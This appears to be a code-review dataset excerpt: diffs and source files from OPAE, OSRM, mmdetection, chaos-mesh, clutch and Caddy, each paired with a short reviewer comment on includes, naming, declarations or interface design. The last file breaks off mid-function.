(err) FPGA_ERR("pthread_mutex_unlock() failed: %S", strerror(err)); err = pthread_mutex_destroy(&_eh->lock); if (err) FPGA_ERR("pthread_mutex_destroy() failed: %S", strerror(err)); free(*event_handle); *event_handle = NULL; return FPGA_OK; } fpga_result __FPGA_API__ fpgaGetOSObjectFromEventHandle(const fpga_event_handle eh, int *fd) { struct _fpga_event_handle *_eh = (struct _fpga_event_handle *) eh; fpga_result result = FPGA_OK; int err = 0; result = event_handle_check_and_lock(_eh); if (result) return result; *fd = _eh->fd; err = pthread_mutex_unlock(&_eh->lock); if (err) FPGA_ERR("pthread_mutex_unlock() failed: %s", strerror(err)); return FPGA_OK; } fpga_result __FPGA_API__ fpgaRegisterEvent(fpga_handle handle, fpga_event_type event_type, fpga_event_handle event_handle, uint32_t flags) { fpga_result result = FPGA_OK; struct _fpga_handle *_handle = (struct _fpga_handle *)handle; struct _fpga_event_handle *_eh = (struct _fpga_event_handle *) event_handle; struct _fpga_token *_token; int err; result = handle_check_and_lock(_handle); if (result) return result; result = event_handle_check_and_lock(_eh); if (result) goto out_unlock_handle; _token = (struct _fpga_token *)_handle->token; if (_token->magic != FPGA_TOKEN_MAGIC) { FPGA_MSG("Invalid token found in handle"); result = FPGA_INVALID_PARAM; goto out_unlock; } switch (event_type) { case FPGA_EVENT_INTERRUPT: if (!strstr(_token->devpath, "port")) { FPGA_MSG("Handle does not refer to accelerator object"); result = FPGA_INVALID_PARAM; goto out_unlock; } break; case FPGA_EVENT_ERROR: /* fall through */ case FPGA_EVENT_POWER_THERMAL: break; } /* TODO: reject unknown flags */ /* try driver first */ result = driver_register_event(handle, event_type, event_handle, flags); if (result == FPGA_NOT_SUPPORTED) { result = daemon_register_event(handle, event_type, event_handle, flags); } out_unlock: err = pthread_mutex_unlock(&_eh->lock); if (err) FPGA_ERR("pthread_mutex_unlock() failed: %s", strerror(err)); out_unlock_handle: err = pthread_mutex_unlock(&_handle->lock); if (err) FPGA_ERR("pthread_mutex_unlock() failed: %s", strerror(err)); return result; } fpga_result __FPGA_API__ fpgaUnregisterEvent(fpga_handle handle, fpga_event_type event_type, fpga_event_handle event_handle) { fpga_result result = FPGA_OK; int err; struct _fpga_handle *_handle = (struct _fpga_handle *)handle; struct _fpga_event_handle *_eh = (struct _fpga_event_handle *) event_handle; struct _fpga_token *_token; result = handle_check_and_lock(_handle); if (result) return result; result = event_handle_check_and_lock(_eh); if (result) goto out_unlock_handle; _token = (struct _fpga_token *)_handle->token; if (_token->magic != FPGA_TOKEN_MAGIC) { FPGA_MSG("Invalid token found in handle"); result = FPGA_INVALID_PARAM; goto out_unlock; } switch (event_type) { case FPGA_EVENT_INTERRUPT: if (!strstr(_token->devpath, "port")) { FPGA_MSG("Handle does not refer to accelerator object"); result = FPGA_INVALID_PARAM; goto out_unlock; } break; case FPGA_EVENT_ERROR: /* fall through */ case FPGA_EVENT_POWER_THERMAL: break; } /* try driver first */ result = driver_unregister_event(handle, event_type, event_handle); if (result == FPGA_NOT_SUPPORTED) { result = daemon_unregister_event(handle, event_type); } out_unlock: err = pthread_mutex_unlock(&_eh->lock); if (err) FPGA_ERR("pthread_mutex_unlock() failed: %s", strerror(err)); out_unlock_handle: err = pthread_mutex_unlock(&_handle->lock); if (err) FPGA_ERR("pthread_mutex_unlock() failed: %s", strerror(err)); return result; }
1
14,509
The event handle is being passed by reference, so the dereference on 591 is actually correct. To follow the convention that variables be declared before executable statements, please change the code to the following: struct _fpga_event_handle *_eh; fpga_result result = FPGA_OK; int err = 0; if (!event_handle) { return FPGA_INVALID_PARAM; } _eh = (struct _fpga_event_handle *) *event_handle;
OPAE-opae-sdk
c
@@ -42,6 +42,7 @@ class named_mutex; #include "../plugins/nearest.hpp" #include "../plugins/timestamp.hpp" #include "../plugins/viaroute.hpp" +#include "../plugins/map_matching.hpp" #include "../server/data_structures/datafacade_base.hpp" #include "../server/data_structures/internal_datafacade.hpp" #include "../server/data_structures/shared_barriers.hpp"
1
/* Copyright (c) 2015, Project OSRM contributors All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ namespace boost { namespace interprocess { class named_mutex; } } #include "osrm_impl.hpp" #include "osrm.hpp" #include "../plugins/distance_table.hpp" #include "../plugins/hello_world.hpp" #include "../plugins/locate.hpp" #include "../plugins/nearest.hpp" #include "../plugins/timestamp.hpp" #include "../plugins/viaroute.hpp" #include "../server/data_structures/datafacade_base.hpp" #include "../server/data_structures/internal_datafacade.hpp" #include "../server/data_structures/shared_barriers.hpp" #include "../server/data_structures/shared_datafacade.hpp" #include "../util/make_unique.hpp" #include "../util/routed_options.hpp" #include "../util/simple_logger.hpp" #include <boost/assert.hpp> #include <boost/interprocess/sync/named_condition.hpp> #include <boost/interprocess/sync/scoped_lock.hpp> #include <osrm/route_parameters.hpp> #include <algorithm> #include <fstream> #include <utility> #include <vector> OSRM_impl::OSRM_impl(libosrm_config &lib_config) { if (lib_config.use_shared_memory) { barrier = osrm::make_unique<SharedBarriers>(); query_data_facade = new SharedDataFacade<QueryEdge::EdgeData>(); } else { // populate base path populate_base_path(lib_config.server_paths); query_data_facade = new InternalDataFacade<QueryEdge::EdgeData>(lib_config.server_paths); } // The following plugins handle all requests. RegisterPlugin(new DistanceTablePlugin<BaseDataFacade<QueryEdge::EdgeData>>( query_data_facade, lib_config.max_locations_distance_table)); RegisterPlugin(new HelloWorldPlugin()); RegisterPlugin(new LocatePlugin<BaseDataFacade<QueryEdge::EdgeData>>(query_data_facade)); RegisterPlugin(new NearestPlugin<BaseDataFacade<QueryEdge::EdgeData>>(query_data_facade)); RegisterPlugin(new TimestampPlugin<BaseDataFacade<QueryEdge::EdgeData>>(query_data_facade)); RegisterPlugin(new ViaRoutePlugin<BaseDataFacade<QueryEdge::EdgeData>>(query_data_facade)); } OSRM_impl::~OSRM_impl() { delete query_data_facade; for (PluginMap::value_type &plugin_pointer : plugin_map) { delete plugin_pointer.second; } } void OSRM_impl::RegisterPlugin(BasePlugin *plugin) { SimpleLogger().Write() << "loaded plugin: " << plugin->GetDescriptor(); if (plugin_map.find(plugin->GetDescriptor()) != plugin_map.end()) { delete plugin_map.find(plugin->GetDescriptor())->second; } plugin_map.emplace(plugin->GetDescriptor(), plugin); } int OSRM_impl::RunQuery(RouteParameters &route_parameters, osrm::json::Object &json_result) { const auto &plugin_iterator = plugin_map.find(route_parameters.service); if (plugin_map.end() == plugin_iterator) { return 400; } increase_concurrent_query_count(); plugin_iterator->second->HandleRequest(route_parameters, json_result); decrease_concurrent_query_count(); return 200; } // decrease number of concurrent queries void OSRM_impl::decrease_concurrent_query_count() { if (!barrier) { return; } // lock query boost::interprocess::scoped_lock<boost::interprocess::named_mutex> query_lock( barrier->query_mutex); // decrement query count --(barrier->number_of_queries); BOOST_ASSERT_MSG(0 <= barrier->number_of_queries, "invalid number of queries"); // notify all processes that were waiting for this condition if (0 == barrier->number_of_queries) { barrier->no_running_queries_condition.notify_all(); } } // increase number of concurrent queries void OSRM_impl::increase_concurrent_query_count() { if (!barrier) { return; } // lock update pending boost::interprocess::scoped_lock<boost::interprocess::named_mutex> pending_lock( barrier->pending_update_mutex); // lock query boost::interprocess::scoped_lock<boost::interprocess::named_mutex> query_lock( barrier->query_mutex); // unlock update pending pending_lock.unlock(); // increment query count ++(barrier->number_of_queries); (static_cast<SharedDataFacade<QueryEdge::EdgeData> *>(query_data_facade)) ->CheckAndReloadFacade(); } // proxy code for compilation firewall OSRM::OSRM(libosrm_config &lib_config) : OSRM_pimpl_(osrm::make_unique<OSRM_impl>(lib_config)) {} OSRM::~OSRM() { OSRM_pimpl_.reset(); } int OSRM::RunQuery(RouteParameters &route_parameters, osrm::json::Object &json_result) { return OSRM_pimpl_->RunQuery(route_parameters, json_result); }
1
14,206
reorder includes to be alphabetically ordered
Project-OSRM-osrm-backend
cpp
@@ -13,7 +13,8 @@ def anchor_target(anchor_list, cfg, gt_labels_list=None, cls_out_channels=1, - sampling=True): + sampling=True, + need_unmap=True): """Compute regression and classification targets for anchors. Args:
1
import torch from ..bbox import assign_and_sample, BBoxAssigner, SamplingResult, bbox2delta from ..utils import multi_apply def anchor_target(anchor_list, valid_flag_list, gt_bboxes_list, img_metas, target_means, target_stds, cfg, gt_labels_list=None, cls_out_channels=1, sampling=True): """Compute regression and classification targets for anchors. Args: anchor_list (list[list]): Multi level anchors of each image. valid_flag_list (list[list]): Multi level valid flags of each image. gt_bboxes_list (list[Tensor]): Ground truth bboxes of each image. img_metas (list[dict]): Meta info of each image. target_means (Iterable): Mean value of regression targets. target_stds (Iterable): Std value of regression targets. cfg (dict): RPN train configs. Returns: tuple """ num_imgs = len(img_metas) assert len(anchor_list) == len(valid_flag_list) == num_imgs # anchor number of multi levels num_level_anchors = [anchors.size(0) for anchors in anchor_list[0]] # concat all level anchors and flags to a single tensor for i in range(num_imgs): assert len(anchor_list[i]) == len(valid_flag_list[i]) anchor_list[i] = torch.cat(anchor_list[i]) valid_flag_list[i] = torch.cat(valid_flag_list[i]) # compute targets for each image if gt_labels_list is None: gt_labels_list = [None for _ in range(num_imgs)] (all_labels, all_label_weights, all_bbox_targets, all_bbox_weights, pos_inds_list, neg_inds_list) = multi_apply( anchor_target_single, anchor_list, valid_flag_list, gt_bboxes_list, gt_labels_list, img_metas, target_means=target_means, target_stds=target_stds, cfg=cfg, cls_out_channels=cls_out_channels, sampling=sampling) # no valid anchors if any([labels is None for labels in all_labels]): return None # sampled anchors of all images num_total_pos = sum([max(inds.numel(), 1) for inds in pos_inds_list]) num_total_neg = sum([max(inds.numel(), 1) for inds in neg_inds_list]) # split targets to a list w.r.t. multiple levels labels_list = images_to_levels(all_labels, num_level_anchors) label_weights_list = images_to_levels(all_label_weights, num_level_anchors) bbox_targets_list = images_to_levels(all_bbox_targets, num_level_anchors) bbox_weights_list = images_to_levels(all_bbox_weights, num_level_anchors) return (labels_list, label_weights_list, bbox_targets_list, bbox_weights_list, num_total_pos, num_total_neg) def images_to_levels(target, num_level_anchors): """Convert targets by image to targets by feature level. [target_img0, target_img1] -> [target_level0, target_level1, ...] """ target = torch.stack(target, 0) level_targets = [] start = 0 for n in num_level_anchors: end = start + n level_targets.append(target[:, start:end].squeeze(0)) start = end return level_targets def anchor_target_single(flat_anchors, valid_flags, gt_bboxes, gt_labels, img_meta, target_means, target_stds, cfg, cls_out_channels=1, sampling=True): inside_flags = anchor_inside_flags(flat_anchors, valid_flags, img_meta['img_shape'][:2], cfg.allowed_border) if not inside_flags.any(): return (None, ) * 6 # assign gt and sample anchors anchors = flat_anchors[inside_flags, :] if sampling: assign_result, sampling_result = assign_and_sample( anchors, gt_bboxes, None, None, cfg) else: bbox_assigner = BBoxAssigner(**cfg.assigner) assign_result = bbox_assigner.assign(anchors, gt_bboxes, None, gt_labels) pos_inds = torch.nonzero( assign_result.gt_inds > 0).squeeze(-1).unique() neg_inds = torch.nonzero( assign_result.gt_inds == 0).squeeze(-1).unique() gt_flags = anchors.new_zeros(anchors.shape[0], dtype=torch.uint8) sampling_result = SamplingResult(pos_inds, neg_inds, anchors, gt_bboxes, assign_result, gt_flags) num_valid_anchors = anchors.shape[0] bbox_targets = torch.zeros_like(anchors) bbox_weights = torch.zeros_like(anchors) labels = anchors.new_zeros(num_valid_anchors, dtype=torch.long) label_weights = anchors.new_zeros(num_valid_anchors, dtype=torch.float) pos_inds = sampling_result.pos_inds neg_inds = sampling_result.neg_inds if len(pos_inds) > 0: pos_bbox_targets = bbox2delta(sampling_result.pos_bboxes, sampling_result.pos_gt_bboxes, target_means, target_stds) bbox_targets[pos_inds, :] = pos_bbox_targets bbox_weights[pos_inds, :] = 1.0 if gt_labels is None: labels[pos_inds] = 1 else: labels[pos_inds] = gt_labels[sampling_result.pos_assigned_gt_inds] if cfg.pos_weight <= 0: label_weights[pos_inds] = 1.0 else: label_weights[pos_inds] = cfg.pos_weight if len(neg_inds) > 0: label_weights[neg_inds] = 1.0 # map up to original set of anchors num_total_anchors = flat_anchors.size(0) labels = unmap(labels, num_total_anchors, inside_flags) label_weights = unmap(label_weights, num_total_anchors, inside_flags) if cls_out_channels > 1: labels, label_weights = expand_binary_labels(labels, label_weights, cls_out_channels) bbox_targets = unmap(bbox_targets, num_total_anchors, inside_flags) bbox_weights = unmap(bbox_weights, num_total_anchors, inside_flags) return (labels, label_weights, bbox_targets, bbox_weights, pos_inds, neg_inds) def expand_binary_labels(labels, label_weights, cls_out_channels): bin_labels = labels.new_full( (labels.size(0), cls_out_channels), 0, dtype=torch.float32) inds = torch.nonzero(labels >= 1).squeeze() if inds.numel() > 0: bin_labels[inds, labels[inds] - 1] = 1 bin_label_weights = label_weights.view(-1, 1).expand( label_weights.size(0), cls_out_channels) return bin_labels, bin_label_weights def anchor_inside_flags(flat_anchors, valid_flags, img_shape, allowed_border=0): img_h, img_w = img_shape[:2] if allowed_border >= 0: inside_flags = valid_flags & \ (flat_anchors[:, 0] >= -allowed_border) & \ (flat_anchors[:, 1] >= -allowed_border) & \ (flat_anchors[:, 2] < img_w + allowed_border) & \ (flat_anchors[:, 3] < img_h + allowed_border) else: inside_flags = valid_flags return inside_flags def unmap(data, count, inds, fill=0): """ Unmap a subset of item (data) back to the original set of items (of size count) """ if data.dim() == 1: ret = data.new_full((count, ), fill) ret[inds] = data else: new_size = (count, ) + data.size()[1:] ret = data.new_full(new_size, fill) ret[inds, :] = data return ret
1
17,013
Rename `need_unmap` to `unmap`.
open-mmlab-mmdetection
py
@@ -26,7 +26,6 @@ import ( "sigs.k8s.io/controller-runtime/pkg/client" "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/common" - cm "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/common" "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/debug/iochaos" "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/debug/networkchaos" "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/debug/stresschaos"
1
// Copyright 2020 Chaos Mesh Authors. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // See the License for the specific language governing permissions and // limitations under the License. package cmd import ( "context" "fmt" "strings" "github.com/go-logr/logr" "github.com/spf13/cobra" v1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/client-go/kubernetes" "sigs.k8s.io/controller-runtime/pkg/client" "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/common" cm "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/common" "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/debug/iochaos" "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/debug/networkchaos" "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/debug/stresschaos" ) type DebugOptions struct { logger logr.Logger namespace string CaCertFile string CertFile string KeyFile string Insecure bool } const ( networkChaos = "networkchaos" stressChaos = "stresschaos" ioChaos = "iochaos" ) func NewDebugCommand(logger logr.Logger) (*cobra.Command, error) { o := &DebugOptions{ logger: logger, } debugCmd := &cobra.Command{ Use: `debug (CHAOSTYPE) [-c CHAOSNAME] [-n NAMESPACE]`, Short: `Print the debug information for certain chaos`, Long: `Print the debug information for certain chaos. Currently support networkchaos, stresschaos and iochaos. Examples: # Return debug information from all networkchaos in default namespace chaosctl debug networkchaos # Return debug information from certain networkchaos chaosctl debug networkchaos CHAOSNAME -n NAMESPACE`, ValidArgsFunction: noCompletions, } // Need to separately support chaos-level completion, so split each chaos apart networkCmd := &cobra.Command{ Use: `networkchaos (CHAOSNAME) [-n NAMESPACE]`, Short: `Print the debug information for certain network chaos`, Long: `Print the debug information for certain network chaos`, RunE: func(cmd *cobra.Command, args []string) error { clientset, err := cm.InitClientSet() if err != nil { return err } return o.Run(networkChaos, args, clientset) }, SilenceErrors: true, SilenceUsage: true, ValidArgsFunction: func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) { clientset, err := cm.InitClientSet() if err != nil { return nil, cobra.ShellCompDirectiveDefault } if len(args) != 0 { return nil, cobra.ShellCompDirectiveNoFileComp } return listChaos(networkChaos, o.namespace, toComplete, clientset.CtrlCli) }, } stressCmd := &cobra.Command{ Use: `stresschaos (CHAOSNAME) [-n NAMESPACE]`, Short: `Print the debug information for certain stress chaos`, Long: `Print the debug information for certain stress chaos`, RunE: func(cmd *cobra.Command, args []string) error { clientset, err := cm.InitClientSet() if err != nil { return err } return o.Run(stressChaos, args, clientset) }, SilenceErrors: true, SilenceUsage: true, ValidArgsFunction: func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) { clientset, err := cm.InitClientSet() if err != nil { return nil, cobra.ShellCompDirectiveDefault } if len(args) != 0 { return nil, cobra.ShellCompDirectiveNoFileComp } return listChaos(stressChaos, o.namespace, toComplete, clientset.CtrlCli) }, } ioCmd := &cobra.Command{ Use: `iochaos (CHAOSNAME) [-n NAMESPACE]`, Short: `Print the debug information for certain io chaos`, Long: `Print the debug information for certain io chaos`, RunE: func(cmd *cobra.Command, args []string) error { clientset, err := cm.InitClientSet() if err != nil { return err } return o.Run(ioChaos, args, clientset) }, SilenceErrors: true, SilenceUsage: true, ValidArgsFunction: func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) { clientset, err := cm.InitClientSet() if err != nil { return nil, cobra.ShellCompDirectiveDefault } if len(args) != 0 { return nil, cobra.ShellCompDirectiveNoFileComp } return listChaos(ioChaos, o.namespace, toComplete, clientset.CtrlCli) }, } debugCmd.AddCommand(networkCmd) debugCmd.AddCommand(stressCmd) debugCmd.AddCommand(ioCmd) debugCmd.PersistentFlags().StringVarP(&o.namespace, "namespace", "n", "default", "namespace to find chaos") debugCmd.PersistentFlags().StringVar(&o.CaCertFile, "cacert", "", "file path to cacert file") debugCmd.PersistentFlags().StringVar(&o.CertFile, "cert", "", "file path to cert file") debugCmd.PersistentFlags().StringVar(&o.KeyFile, "key", "", "file path to key file") debugCmd.PersistentFlags().BoolVarP(&o.Insecure, "insecure", "i", false, "Insecure mode will use unauthorized grpc") err := debugCmd.RegisterFlagCompletionFunc("namespace", func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) { clientset, err := cm.InitClientSet() if err != nil { return nil, cobra.ShellCompDirectiveDefault } return listNamespace(toComplete, clientset.KubeCli) }) return debugCmd, err } // Run debug func (o *DebugOptions) Run(chaosType string, args []string, c *cm.ClientSet) error { if len(args) > 1 { return fmt.Errorf("only one chaos could be specified") } ctx, cancel := context.WithCancel(context.Background()) defer cancel() chaosName := "" if len(args) == 1 { chaosName = args[0] } chaosList, chaosNameList, err := cm.GetChaosList(ctx, chaosType, chaosName, o.namespace, c.CtrlCli) if err != nil { return err } var result []cm.ChaosResult common.TLSFiles = common.TLSFileConfig{CaCert: o.CaCertFile, Cert: o.CertFile, Key: o.KeyFile} common.Insecure = o.Insecure for i, chaos := range chaosList { var chaosResult cm.ChaosResult chaosResult.Name = chaosNameList[i] var err error switch chaosType { case networkChaos: err = networkchaos.Debug(ctx, chaos, c, &chaosResult) case stressChaos: err = stresschaos.Debug(ctx, chaos, c, &chaosResult) case ioChaos: err = iochaos.Debug(ctx, chaos, c, &chaosResult) default: return fmt.Errorf("chaos type not supported") } result = append(result, chaosResult) if err != nil { cm.PrintResult(result) return err } } cm.PrintResult(result) return nil } func listNamespace(toComplete string, c *kubernetes.Clientset) ([]string, cobra.ShellCompDirective) { namespaces, err := c.CoreV1().Namespaces().List(v1.ListOptions{}) if err != nil { return nil, cobra.ShellCompDirectiveDefault } var ret []string for _, ns := range namespaces.Items { if strings.HasPrefix(ns.Name, toComplete) { ret = append(ret, ns.Name) } } return ret, cobra.ShellCompDirectiveNoFileComp } func listChaos(chaosType string, namespace string, toComplete string, c client.Client) ([]string, cobra.ShellCompDirective) { ctx, cancel := context.WithCancel(context.Background()) defer cancel() _, chaosList, err := cm.GetChaosList(ctx, chaosType, "", namespace, c) if err != nil { return nil, cobra.ShellCompDirectiveDefault } var ret []string for _, chaos := range chaosList { if strings.HasPrefix(chaos, toComplete) { ret = append(ret, chaos) } } return ret, cobra.ShellCompDirectiveNoFileComp }
1
21,458
In line 28, it has been declared twice, so removing `cm` should not impact, can you explain me little bit? :)
chaos-mesh-chaos-mesh
go
@@ -16,7 +16,10 @@ import ( const Name = "clutch.service.topology" -type Service interface{} +type Service interface { + acquireTopologyCacheLock() + startTopologyCache() +} type client struct { config *topologyv1.Config
1
package topology import ( "database/sql" "errors" "github.com/golang/protobuf/ptypes" "github.com/golang/protobuf/ptypes/any" "github.com/uber-go/tally" "go.uber.org/zap" topologyv1 "github.com/lyft/clutch/backend/api/config/service/topology/v1" "github.com/lyft/clutch/backend/service" pgservice "github.com/lyft/clutch/backend/service/db/postgres" ) const Name = "clutch.service.topology" type Service interface{} type client struct { config *topologyv1.Config db *sql.DB log *zap.Logger scope tally.Scope } func New(cfg *any.Any, logger *zap.Logger, scope tally.Scope) (service.Service, error) { topologyConfig := &topologyv1.Config{} err := ptypes.UnmarshalAny(cfg, topologyConfig) if err != nil { return nil, err } p, ok := service.Registry[pgservice.Name] if !ok { return nil, errors.New("Please config the datastore [clutch.service.db.postgres] to use the topology service") } dbClient, ok := p.(pgservice.Client) if !ok { return nil, errors.New("Unable to get the datastore client") } return &client{ config: topologyConfig, db: dbClient.DB(), log: logger, scope: scope, }, nil }
1
8,773
i don't think these unexported functions belong on the public interface, they can exist solely on the struct.
lyft-clutch
go
@@ -263,6 +263,13 @@ func (h Helper) NewBindAddresses(addrs []string) []ConfigValue { return []ConfigValue{{Class: "bind", Value: addrs}} } +// WithDispenser returns a new instance based on d. All others Helper +// fields are copied, so typically maps are shared with this new instance. +func (h Helper) WithDispenser(d *caddyfile.Dispenser) Helper { + h.Dispenser = d + return h +} + // ParseSegmentAsSubroute parses the segment such that its subdirectives // are themselves treated as directives, from which a subroute is built // and returned.
1
// Copyright 2015 Matthew Holt and The Caddy Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package httpcaddyfile import ( "encoding/json" "net" "sort" "strconv" "strings" "github.com/caddyserver/caddy/v2" "github.com/caddyserver/caddy/v2/caddyconfig" "github.com/caddyserver/caddy/v2/caddyconfig/caddyfile" "github.com/caddyserver/caddy/v2/modules/caddyhttp" ) // directiveOrder specifies the order // to apply directives in HTTP routes. // // The root directive goes first in case rewrites or // redirects depend on existence of files, i.e. the // file matcher, which must know the root first. // // The header directive goes second so that headers // can be manipulated before doing redirects. var directiveOrder = []string{ "map", "root", "header", "request_body", "redir", "rewrite", // URI manipulation "uri", "try_files", // middleware handlers; some wrap responses "basicauth", "request_header", "encode", "templates", // special routing & dispatching directives "handle", "handle_path", "route", "push", // handlers that typically respond to requests "respond", "metrics", "reverse_proxy", "php_fastcgi", "file_server", "acme_server", } // directiveIsOrdered returns true if dir is // a known, ordered (sorted) directive. func directiveIsOrdered(dir string) bool { for _, d := range directiveOrder { if d == dir { return true } } return false } // RegisterDirective registers a unique directive dir with an // associated unmarshaling (setup) function. When directive dir // is encountered in a Caddyfile, setupFunc will be called to // unmarshal its tokens. func RegisterDirective(dir string, setupFunc UnmarshalFunc) { if _, ok := registeredDirectives[dir]; ok { panic("directive " + dir + " already registered") } registeredDirectives[dir] = setupFunc } // RegisterHandlerDirective is like RegisterDirective, but for // directives which specifically output only an HTTP handler. // Directives registered with this function will always have // an optional matcher token as the first argument. func RegisterHandlerDirective(dir string, setupFunc UnmarshalHandlerFunc) { RegisterDirective(dir, func(h Helper) ([]ConfigValue, error) { if !h.Next() { return nil, h.ArgErr() } matcherSet, err := h.ExtractMatcherSet() if err != nil { return nil, err } val, err := setupFunc(h) if err != nil { return nil, err } return h.NewRoute(matcherSet, val), nil }) } // RegisterGlobalOption registers a unique global option opt with // an associated unmarshaling (setup) function. When the global // option opt is encountered in a Caddyfile, setupFunc will be // called to unmarshal its tokens. func RegisterGlobalOption(opt string, setupFunc UnmarshalGlobalFunc) { if _, ok := registeredGlobalOptions[opt]; ok { panic("global option " + opt + " already registered") } registeredGlobalOptions[opt] = setupFunc } // Helper is a type which helps setup a value from // Caddyfile tokens. type Helper struct { *caddyfile.Dispenser // State stores intermediate variables during caddyfile adaptation. State map[string]interface{} options map[string]interface{} warnings *[]caddyconfig.Warning matcherDefs map[string]caddy.ModuleMap parentBlock caddyfile.ServerBlock groupCounter counter } // Option gets the option keyed by name. func (h Helper) Option(name string) interface{} { return h.options[name] } // Caddyfiles returns the list of config files from // which tokens in the current server block were loaded. func (h Helper) Caddyfiles() []string { // first obtain set of names of files involved // in this server block, without duplicates files := make(map[string]struct{}) for _, segment := range h.parentBlock.Segments { for _, token := range segment { files[token.File] = struct{}{} } } // then convert the set into a slice filesSlice := make([]string, 0, len(files)) for file := range files { filesSlice = append(filesSlice, file) } return filesSlice } // JSON converts val into JSON. Any errors are added to warnings. func (h Helper) JSON(val interface{}) json.RawMessage { return caddyconfig.JSON(val, h.warnings) } // MatcherToken assumes the next argument token is (possibly) a matcher, // and if so, returns the matcher set along with a true value. If the next // token is not a matcher, nil and false is returned. Note that a true // value may be returned with a nil matcher set if it is a catch-all. func (h Helper) MatcherToken() (caddy.ModuleMap, bool, error) { if !h.NextArg() { return nil, false, nil } return matcherSetFromMatcherToken(h.Dispenser.Token(), h.matcherDefs, h.warnings) } // ExtractMatcherSet is like MatcherToken, except this is a higher-level // method that returns the matcher set described by the matcher token, // or nil if there is none, and deletes the matcher token from the // dispenser and resets it as if this look-ahead never happened. Useful // when wrapping a route (one or more handlers) in a user-defined matcher. func (h Helper) ExtractMatcherSet() (caddy.ModuleMap, error) { matcherSet, hasMatcher, err := h.MatcherToken() if err != nil { return nil, err } if hasMatcher { // strip matcher token; we don't need to // use the return value here because a // new dispenser should have been made // solely for this directive's tokens, // with no other uses of same slice h.Dispenser.Delete() } h.Dispenser.Reset() // pretend this lookahead never happened return matcherSet, nil } // NewRoute returns config values relevant to creating a new HTTP route. func (h Helper) NewRoute(matcherSet caddy.ModuleMap, handler caddyhttp.MiddlewareHandler) []ConfigValue { mod, err := caddy.GetModule(caddy.GetModuleID(handler)) if err != nil { *h.warnings = append(*h.warnings, caddyconfig.Warning{ File: h.File(), Line: h.Line(), Message: err.Error(), }) return nil } var matcherSetsRaw []caddy.ModuleMap if matcherSet != nil { matcherSetsRaw = append(matcherSetsRaw, matcherSet) } return []ConfigValue{ { Class: "route", Value: caddyhttp.Route{ MatcherSetsRaw: matcherSetsRaw, HandlersRaw: []json.RawMessage{caddyconfig.JSONModuleObject(handler, "handler", mod.ID.Name(), h.warnings)}, }, }, } } // GroupRoutes adds the routes (caddyhttp.Route type) in vals to the // same group, if there is more than one route in vals. func (h Helper) GroupRoutes(vals []ConfigValue) { // ensure there's at least two routes; group of one is pointless var count int for _, v := range vals { if _, ok := v.Value.(caddyhttp.Route); ok { count++ if count > 1 { break } } } if count < 2 { return } // now that we know the group will have some effect, do it groupName := h.groupCounter.nextGroup() for i := range vals { if route, ok := vals[i].Value.(caddyhttp.Route); ok { route.Group = groupName vals[i].Value = route } } } // NewBindAddresses returns config values relevant to adding // listener bind addresses to the config. func (h Helper) NewBindAddresses(addrs []string) []ConfigValue { return []ConfigValue{{Class: "bind", Value: addrs}} } // ParseSegmentAsSubroute parses the segment such that its subdirectives // are themselves treated as directives, from which a subroute is built // and returned. func ParseSegmentAsSubroute(h Helper) (caddyhttp.MiddlewareHandler, error) { allResults, err := parseSegmentAsConfig(h) if err != nil { return nil, err } return buildSubroute(allResults, h.groupCounter) } // parseSegmentAsConfig parses the segment such that its subdirectives // are themselves treated as directives, including named matcher definitions, // and the raw Config structs are returned. func parseSegmentAsConfig(h Helper) ([]ConfigValue, error) { var allResults []ConfigValue for h.Next() { // don't allow non-matcher args on the first line if h.NextArg() { return nil, h.ArgErr() } // slice the linear list of tokens into top-level segments var segments []caddyfile.Segment for nesting := h.Nesting(); h.NextBlock(nesting); { segments = append(segments, h.NextSegment()) } // copy existing matcher definitions so we can augment // new ones that are defined only in this scope matcherDefs := 